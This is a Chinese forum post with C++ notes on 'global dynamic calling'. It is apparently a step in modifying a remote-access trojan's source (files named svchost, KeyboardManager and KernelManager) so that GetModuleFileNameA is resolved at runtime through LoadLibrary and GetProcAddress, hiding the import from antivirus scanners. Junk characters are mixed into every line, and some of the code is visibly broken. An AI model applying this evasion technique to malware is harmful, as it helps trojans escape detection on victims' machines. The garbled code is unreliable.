[原创文章] 全局动态调用 全局, 动态

ice_xke

全局动态调用笔记% [" b+ t# @/ _3 }& S* w' l
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h$ ]! P- r3 M; |) ^( M
----------------------------------------5 B& G  B" o+ N2 I9 f0 I
DTDY.h：0 f- M: k3 K$ y6 q; Q3 p

# Z- z* u, I# b- z8 G  Z#if _MSC_VER>1000
. P$ Z+ B* b3 n- ~#pragma once) G: Z& ^+ t# Z' Q" p& @
#endif //_MSC_VER>1000
3 W3 T8 E5 X9 Z. L' M#include<windows.h>" S+ i' w2 ]' D0 P3 P  h" T, H, ^

# J  E$ l% K1 J# Ftypedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);. g. h6 h4 T7 b
class DTDY
5 V3 H, r# U+ ^6 M- o{: t! q% a6 ^" x  x8 g. X/ \
public:# G- s. b2 \$ T7 Z0 N, M, X
DTDY();8 ]2 g- j' e# A! f6 V" J4 h
virtual ~DTDY();; ^6 C. \) K% q; z$ G5 P+ k3 N, S
public:% b4 V+ W1 p. r* H9 D0 U: G" g1 c0 c
static pGetModuleFileNameA MyGetModuleFileName;
6 s8 K) H0 S% P4 bstatic BOOL FunInitiallization();
: W- L: r/ e0 C. k};
/ s8 z; z6 f( B; E7 d#endif+ w$ ?+ S3 C* N8 O
----------------------------------------+ F1 D/ S7 u. l8 N/ g& b0 Z2 U- C

) P& b1 J" Z6 p: |# VDTDY.cpp:6 V5 U# R( i% b& L0 w
" Z+ `: f& c9 G9 B& h) @
#include "DTDY.h"
6 T6 [+ r7 }  H+ Y5 t; M6 k3 s+ E: apGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
+ U, d. r( ~! [3 z7 V3 B6 aDTDY:TDY()5 y( ?2 A, l1 X9 r8 ]
{
/ p$ m. r/ ~* g4 ^}* T; _4 P7 j+ m3 e) v% X
DTDY::~DTDY()8 s" O& b- [* {& _' Q6 H' {( q
{% g/ M. N  T# |! S
}; I+ y9 X8 U6 W7 d8 z1 O0 _/ X
BOOL DTDY::FunInitiallization()
4 d/ p1 r4 i- H  B2 y5 c{
) X. u- j* ?! z4 f5 K9 N- @HMODULE hModule=LoadLibrary("kernel32.dll");% \; G) z- E# t( O
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
" J5 J; L1 \" ]if(!MyGetModuleFileName=) return FALSE;
2 \: r0 o/ M% V% g: I( O
- B* X+ l- [# S& \: O/ ]) P0 Greturn TRUE;  R  {( j% v# Q/ j6 o
}
9 c# m! o0 b4 w' t----------------------------------------
4 C' K2 p" ^# u  A- }, b" m* lsvchost.cpp:
' j# y, z1 a9 K3 J
! o. J! _  j, f3 t0 d2 S( S6 ~#include "DTDY.h"
! s  J2 p. ^5 R$ Z+ T& e# a6 x, C  m9 O% p+ X
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
& c) c# m1 ^$ E" x5 f% p{. o& q& C+ Q+ Z/ j- ~2 b* |1 R
switch(ul_reason_for_call)
( J: I! W! _0 Q{
2 u: B* A& x- K6 n' w: N" `case DLL_PROCESS_ATTACH:
( p6 L2 c4 A  n. r+ d- Dif(!DTDY::FunInitiallization()) return FALSE;
0 s* J' L) d* Z& i" @
+ p2 r, }3 h( q: q$ `' e: ubreak;5 R  Z0 A' k0 D0 U* t* t
}
3 _( l" X4 ]. \; D" K. Z$ @}9 d8 ?" g( o: A9 @+ D! R* C

* a$ V9 \$ [+ x: _, P& {& h( f# A+ W
' u2 v0 a7 l; D  e0 wGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def9 z% m2 }8 K# H8 s, u4 g- Y/ Y
改写为
& b4 Q7 I5 Y6 L" N3 ADTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
& i1 q" X: P# W1 Z, B. y% e1 m----------------------------------------$ z: B2 I' @: R( D  h3 a# ?. e% \
KernelManager.cpp:7 e/ u( s: l7 ?3 I7 ?# g0 W- h
  t5 F. z$ U& E. _; N
#include "../DTDY.h"  `4 x6 |! W& h) _- H
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
! M; p# [0 b' n7 g& _  a改写为5 |% `: L5 B5 `
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));. M7 F  ]! E( F& W' ?: m
----------------------------------------